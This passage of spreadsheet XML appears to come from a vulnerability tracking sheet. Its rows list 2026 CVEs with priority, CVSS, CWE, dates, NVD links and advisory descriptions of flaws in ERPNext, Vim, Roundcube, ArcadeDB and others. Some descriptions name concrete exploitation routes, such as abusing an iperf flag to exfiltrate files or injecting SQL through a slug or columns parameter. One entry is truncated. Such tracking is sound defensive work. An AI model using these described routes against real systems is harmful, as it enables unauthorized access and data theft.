      <c r="L3220" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.112.0 and 16.23.0, the ReceivablePayableReport prepare_conditions path in erpnext/accounts/report/accounts_receivable/accounts_receivable.py does not apply Customer and Supplier user permissions to the Payment Ledger Entry dynamic-link party field, allowing any authenticated user to read unauthorized cross-company financial data in Accounts Receivable and Accounts Payable reports. This issue is fixed in versions 15.112.0 and 16.23.0.</t>
        </is>
      </c>
      <c r="M3220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72909</t>
        </is>
      </c>
    </row>
    <row r="3221">
      <c r="A3221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72910</t>
        </is>
      </c>
      <c r="C3221" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3221" s="5" t="inlineStr"/>
      <c r="F3221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3221" s="5" t="inlineStr"/>
      <c r="H3221" s="5" t="inlineStr"/>
      <c r="I3221" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3221" s="5" t="inlineStr"/>
      <c r="K3221" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3221" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.112.0 and 16.22.0, the merge_account, pause_job_for_doc, trigger_job_for_doc, change_release_date, and update_cost_center functions across erpnext/accounts/doctype/account/account.py, erpnext/accounts/doctype/process_payment_reconciliation/process_payment_reconciliation.py, erpnext/accounts/doctype/purchase_invoice/purchase_invoice.py, and erpnext/accounts/utils.py omit required write permission checks, allowing authenticated limited users to modify protected data beyond their roles. This issue is fixed in versions 15.112.0 and 16.22.0.</t>
        </is>
      </c>
      <c r="M3221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72910</t>
        </is>
      </c>
    </row>
    <row r="3222">
      <c r="A3222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73074</t>
        </is>
      </c>
      <c r="C3222" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3222" s="5" t="inlineStr"/>
      <c r="F3222" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3222" s="5" t="inlineStr"/>
      <c r="H3222" s="5" t="inlineStr"/>
      <c r="I3222" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3222" s="5" t="inlineStr"/>
      <c r="K3222" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3222" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0841, prop_add_one() in src/textprop.c uses the proplen value from get_text_props() to increment a uint16_t property count beyond 0xffff, wrapping the count to zero and copying existing text-property records into a heap allocation sized for none of them. This issue is fixed in version 9.2.0841.</t>
        </is>
      </c>
      <c r="M3222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73074</t>
        </is>
      </c>
    </row>
    <row r="3223">
      <c r="A3223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73215</t>
        </is>
      </c>
      <c r="C3223" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3223" s="5" t="inlineStr"/>
      <c r="F3223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3223" s="5" t="inlineStr"/>
      <c r="H3223" s="5" t="inlineStr"/>
      <c r="I3223" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3223" s="5" t="inlineStr"/>
      <c r="K3223" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="L3223" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.17.0, turnports_allocate_even() in src/apps/relay/turn_ports.c marks the unused odd sibling port as TPS_TAKEN_ODD for an EVEN-PORT Allocate request with reservation bit R=0 even though no RTCP socket will release it, allowing an authenticated client to permanently exhaust the relay port pool and cause subsequent allocations to fail with STUN error 508. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M3223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73215</t>
        </is>
      </c>
    </row>
    <row r="3224">
      <c r="A3224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73266</t>
        </is>
      </c>
      <c r="C3224" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3224" s="5" t="inlineStr"/>
      <c r="F3224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3224" s="5" t="inlineStr"/>
      <c r="H3224" s="5" t="inlineStr"/>
      <c r="I3224" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3224" s="5" t="inlineStr"/>
      <c r="K3224" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L3224" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the clusterclaims-controller component of Multicluster Engine (MCE). An authenticated tenant can exploit this vulnerability by manipulating ClusterClaim labels. This allows the tenant to force a cluster to join a ManagedClusterSet belonging to another tenant. Such unauthorized access could enable the injection of policies and workloads into other tenants' clusters.</t>
        </is>
      </c>
      <c r="M3224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73266</t>
        </is>
      </c>
    </row>
    <row r="3225">
      <c r="A3225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73321</t>
        </is>
      </c>
      <c r="C3225" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3225" s="5" t="inlineStr"/>
      <c r="F3225" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3225" s="5" t="inlineStr"/>
      <c r="H3225" s="5" t="inlineStr"/>
      <c r="I3225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3225" s="5" t="inlineStr"/>
      <c r="K3225" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L3225" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t>
        </is>
      </c>
      <c r="M3225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t>
        </is>
      </c>
    </row>
    <row r="3226">
      <c r="A3226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73331</t>
        </is>
      </c>
      <c r="C3226" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3226" s="5" t="inlineStr"/>
      <c r="F3226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3226" s="5" t="inlineStr"/>
      <c r="H3226" s="5" t="inlineStr"/>
      <c r="I3226" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3226" s="5" t="inlineStr"/>
      <c r="K3226" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3226" s="5" t="inlineStr">
        <is>
          <t>CamaleonCMS 2.9.1 contains an authenticated SQL injection vulnerability that allows authenticated attackers with post creation or editing privileges to submit a crafted slug value containing SQL syntax that the database backend evaluates as part of an inadequately parameterized query. Attackers can supply malicious slug payloads using boolean- or union-style blind SQL injection techniques to extract sensitive data from the underlying SQLite database, including administrative credentials and configuration values stored in application tables.</t>
        </is>
      </c>
      <c r="M3226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73331</t>
        </is>
      </c>
    </row>
    <row r="3227">
      <c r="A3227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74039</t>
        </is>
      </c>
      <c r="C3227" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3227" s="5" t="inlineStr"/>
      <c r="F3227" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3227" s="5" t="inlineStr"/>
      <c r="H3227" s="5" t="inlineStr"/>
      <c r="I3227" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3227" s="5" t="inlineStr"/>
      <c r="K3227" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-770</t>
        </is>
      </c>
      <c r="L3227" s="5" t="inlineStr">
        <is>
          <t>Wazuh 4.0.0 before 4.14.7 and 5.0.0-beta2 contain a denial of service vulnerability that allows authenticated attackers with allow_run_as enabled to exhaust CPU resources by submitting arbitrarily deeply nested JSON structures to the POST /security/user/authenticate/run_as endpoint. Attackers can repeatedly submit malformed auth_context bodies with unlimited nesting depth to cause the API framework to consume excessive CPU, denying service to all other API consumers.</t>
        </is>
      </c>
      <c r="M3227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74039</t>
        </is>
      </c>
    </row>
    <row r="3228">
      <c r="A3228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74237</t>
        </is>
      </c>
      <c r="C3228" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3228" s="5" t="inlineStr"/>
      <c r="F3228" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3228" s="5" t="inlineStr"/>
      <c r="H3228" s="5" t="inlineStr"/>
      <c r="I3228" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3228" s="5" t="inlineStr"/>
      <c r="K3228" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3228" s="5" t="inlineStr">
        <is>
          <t>GFI Exinda AI and ClearView before 7.6.5 contains an argument injection vulnerability in the Tools Iperf Client functionality. The web_tools_cmd() function constructs an iperf command using the server and options parameters without sanitization, permitting injection of arbitrary iperf flags. An authenticated attacker with Unprivileged (lowest-level) access can supply the iperf -F flag to read an arbitrary file from the system and transmit its contents to an attacker-controlled server.</t>
        </is>
      </c>
      <c r="M3228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74237</t>
        </is>
      </c>
    </row>
    <row r="3229">
      <c r="A3229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74881</t>
        </is>
      </c>
      <c r="C3229" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3229" s="5" t="inlineStr"/>
      <c r="F3229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3229" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H3229" s="5" t="inlineStr">
        <is>
          <t>jahlives:openssl_encrypt</t>
        </is>
      </c>
      <c r="I3229" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3229" s="5" t="inlineStr"/>
      <c r="K3229" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L3229" s="5" t="inlineStr">
        <is>
          <t>openssl_encrypt versions before 1.4.0 configure CORS with allow_origins set to wildcard and allow_credentials enabled to true. Attackers can create malicious websites that make authenticated cross-origin requests to the API on behalf of any user who visits them.</t>
        </is>
      </c>
      <c r="M3229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74881</t>
        </is>
      </c>
    </row>
    <row r="3230">
      <c r="A3230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75002</t>
        </is>
      </c>
      <c r="C3230" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3230" s="5" t="inlineStr"/>
      <c r="F3230" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G3230" s="5" t="inlineStr"/>
      <c r="H3230" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I3230" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3230" s="5" t="inlineStr"/>
      <c r="K3230" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3230" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, mail search and LITERAL+ byte-count desynchronization could lead to information disclosure or privilege escalation via IMAP command injection.</t>
        </is>
      </c>
      <c r="M3230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75002</t>
        </is>
      </c>
    </row>
    <row r="3231">
      <c r="A3231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75132</t>
        </is>
      </c>
      <c r="C3231" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3231" s="5" t="inlineStr"/>
      <c r="F3231" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3231" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H3231" s="5" t="inlineStr"/>
      <c r="I3231" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3231" s="5" t="inlineStr"/>
      <c r="K3231" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3231" s="5" t="inlineStr">
        <is>
          <t>WAPT Server versions 2.6.1.17834 and earlier contains a SQL injection vulnerability in the `columns` parameter of the GET `/api/v3/hosts` endpoint. A remote authenticated user with read-only privileges can inject arbitrary PostgreSQL expressions into the SQL query constructed by WAPT. By exploiting the injection point, an attacker can inject additional PostgreSQL statements, bypass the host scope restrictions applied to the account, and read information from other rows or tables within the database.</t>
        </is>
      </c>
      <c r="M3231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75132</t>
        </is>
      </c>
    </row>
    <row r="3232">
      <c r="A3232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75369</t>
        </is>
      </c>
      <c r="C3232" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3232" s="5" t="inlineStr"/>
      <c r="F3232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3232" s="5" t="inlineStr"/>
      <c r="H3232" s="5" t="inlineStr"/>
      <c r="I3232" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3232" s="5" t="inlineStr"/>
      <c r="K3232" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3232" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in the CAN::Application::parsePerformFunctionMessage component of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted CAN message.</t>
        </is>
      </c>
      <c r="M3232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75369</t>
        </is>
      </c>
    </row>
    <row r="3233">
      <c r="A3233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75830</t>
        </is>
      </c>
      <c r="C3233" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3233" s="5" t="inlineStr"/>
      <c r="F3233" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3233" s="5" t="inlineStr"/>
      <c r="H3233" s="5" t="inlineStr"/>
      <c r="I3233" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3233" s="5" t="inlineStr"/>
      <c r="K3233" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3233" s="5" t="inlineStr">
        <is>
          <t>grav-plugi</t>
        </is>
      </c>
      <c r="M3233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75830</t>
        </is>
      </c>
    </row>
    <row r="3234">
      <c r="A3234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75846</t>
        </is>
      </c>
      <c r="C3234" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3234" s="5" t="inlineStr"/>
      <c r="F3234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3234" s="5" t="inlineStr"/>
      <c r="H3234" s="5" t="inlineStr"/>
      <c r="I3234" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3234" s="5" t="inlineStr"/>
      <c r="K3234" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3234" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 (affected versions &lt;= 26.7.3) contains a missing authorization vulnerability in the DELETE FUNCTION SQL statement. DeleteFunctionStatement.executeSimple unregisters and persists deletion of a server-side function without any checkPermissionsOnDatabase (UPDATE_SCHEMA) check. Any user with database access can execute DELETE FUNCTION via the command API (POST /api/v1/command/{db}) to permanently remove any registered server-side function, including security-relevant logic, impacting integrity and availability.</t>
        </is>
      </c>
      <c r="M3234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75846</t>
        </is>
      </c>
    </row>
    <row r="3235">
      <c r="A3235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76223</t>
        </is>
      </c>
      <c r="C3235" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3235" s="5" t="inlineStr"/>
      <c r="F3235" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3235" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3235" s="5" t="inlineStr"/>
      <c r="I3235" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3235" s="5" t="inlineStr"/>
      <c r="K3235" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3235" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB (com.arcadedb) versions 26.7.3 and earlier fail to enforce the UPDATE_SCHEMA permission check when a DEFINE FUNCTION statement targets an already-existing function library. A user with only database access can add or overwrite SQL or Cypher functions in an existing library and persist the change, enabling tampering with admin-defined function logic. The issue is fixed in 26.8.1. (JavaScript functions still trigger the UPDATE_SECURITY check and are not affected.)</t>
        </is>
      </c>
      <c r="M3235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76223</t>
        </is>
      </c>
    </row>
    <row r="3236">
      <c r="A3236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77125</t>
        </is>
      </c>
      <c r="C3236" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3236" s="5" t="inlineStr"/>
      <c r="F3236" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3236" s="5" t="inlineStr"/>
      <c r="H3236" s="5" t="inlineStr"/>
      <c r="I3236" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3236" s="5" t="inlineStr"/>
      <c r="K3236" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3236" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Sonatype Nexus Repository 3 in which two blobstore group management REST API endpoints did not correctly enforce the intended authorization check. A user granted only the nexus:blobstores:create permission could invoke these endpoints to convert an existing blobstore into a group blobstore, an action that should require the nexus:blobstores:update permission instead. This could result in unauthorized modification of blobstore configuration without administrator approval. The nexus:blobstores:create permission is a named permission that must be explicitly granted by an administrator; it is not held by default.</t>
        </is>
      </c>
      <c r="M3236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77125</t>
        </is>
      </c>
    </row>
    <row r="3237">
      <c r="A3237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77611</t>
        </is>
      </c>
      <c r="C3237" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3237" s="5" t="inlineStr"/>
      <c r="F3237" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3237" s="5" t="inlineStr"/>
      <c r="H3237" s="5" t="inlineStr"/>
      <c r="I3237" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3237" s="5" t="inlineStr"/>
      <c r="K3237" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3237" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions prior to 4.40, an authenticated S3 principal with permissions scoped to a nested object key can overwrite a different object outside that scope by calling PutObjectAcl on the key it is allowed to access. The handler authorizes the request against the requested nested key but then writes the updated entry back to the bucket root rather than the key's actual parent directory, so an ACL change on allowed/protected.txt is instead applied to protected.txt at the bucket root. Because the update carries the full entry rather than only ACL metadata, an existing target object is overwritten with the content, metadata, owner information, and ACL of the scoped object, bypassing the object-level action scoping configured through the static S3 identity file. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="M3237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77611</t>
        </is>
      </c>
    </row>
    <row r="3238">
      <c r="A3238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77847</t>
        </is>
      </c>
      <c r="C3238" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3238" s="5" t="inlineStr"/>
      <c r="F3238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3238" s="5" t="inlineStr"/>
      <c r="H3238" s="5" t="inlineStr"/>
      <c r="I3238" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3238" s="5" t="inlineStr"/>
      <c r="K3238" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3238" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a use of hard-coded credential vulnerability. This could allow an attacker to intercept sensitive information or credentials.</t>
        </is>
      </c>
      <c r="M3238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77847</t>
        </is>
      </c>
    </row>
    <row r="3239">
      <c r="A3239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77939</t>
        </is>
      </c>
      <c r="C3239" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3239" s="5" t="inlineStr"/>
      <c r="F3239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3239" s="5" t="inlineStr"/>
      <c r="H3239" s="5" t="inlineStr"/>
      <c r="I3239" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3239" s="5" t="inlineStr"/>
      <c r="K3239" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L3239" s="5" t="inlineStr">
        <is>
          <t>Flextype CMS through v1.0.0-dev contains an expression language injection vulnerability that allows authenticated attackers with a valid API token to read arbitrary files by passing unsanitized user-supplied input to the Symfony ExpressionLanguage engine via the POST /api/v1/query endpoint. Attackers can leverage exposed application objects including filesystem() and serializers() within the evaluation scope to read arbitrary server files and achieve conditional remote code execution if a PHP file can be placed on disk through a secondary vector.</t>
        </is>
      </c>
      <c r="M3239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77939</t>
        </is>
      </c>
    </row>
    <row r="3240">
      <c r="A3240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78083</t>
        </is>
      </c>
      <c r="C3240" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3240" s="5" t="inlineStr"/>
      <c r="F3240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3240" s="5" t="inlineStr"/>
      <c r="H3240" s="5" t="inlineStr"/>
      <c r="I3240" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3240" s="5" t="inlineStr"/>
      <c r="K3240" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3240" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Missing CSRF Token Verification in Property Booking and Agent Contact Endpoints in SP Property &lt; 4.1.4 - The visitor booking (properties.booking) and agent contact form submission (agents.sendmail) endpoints processed POST requests without verifying Joomla session anti-CSRF tokens.</t>
        </is>
      </c>
      <c r="M3240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78083</t>
        </is>
      </c>
    </row>
    <row r="3241">
      <c r="A3241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78134</t>
        </is>
      </c>
      <c r="C3241" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3241" s="5" t="inlineStr"/>
      <c r="F3241" s="5" t="inlineStr"/>
      <c r="G3241" s="5" t="inlineStr"/>
      <c r="H3241" s="5" t="inlineStr"/>
      <c r="I3241" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3241" s="5" t="inlineStr"/>
      <c r="K3241" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3241" s="5" t="inlineStr">
        <is>
